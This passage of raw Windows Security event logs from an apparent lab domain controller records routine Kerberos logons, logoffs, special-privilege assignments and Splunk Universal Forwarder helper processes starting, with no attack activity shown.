Logon ID: 0x8BD9AA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265119
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BE82B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:57:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265118
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8BE82B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64987
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:57:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265117
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8BE82B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:58:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265120
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265122
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1084
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265121
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265123
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265124
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x111c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265126
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x198c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265125
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1538
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265127
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8BD93F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:58:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265130
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C2230
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:58:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265129
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C2230
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65000
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:58:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265128
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C2230
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265131
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265144
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265143
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3067
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265142
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3155
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265141
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C319D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265140
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C325A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65005
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265139
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C325A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265138
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C319D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 65004
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265137
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C319D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265136
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C3155
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265135
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3155
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265134
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C3067
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
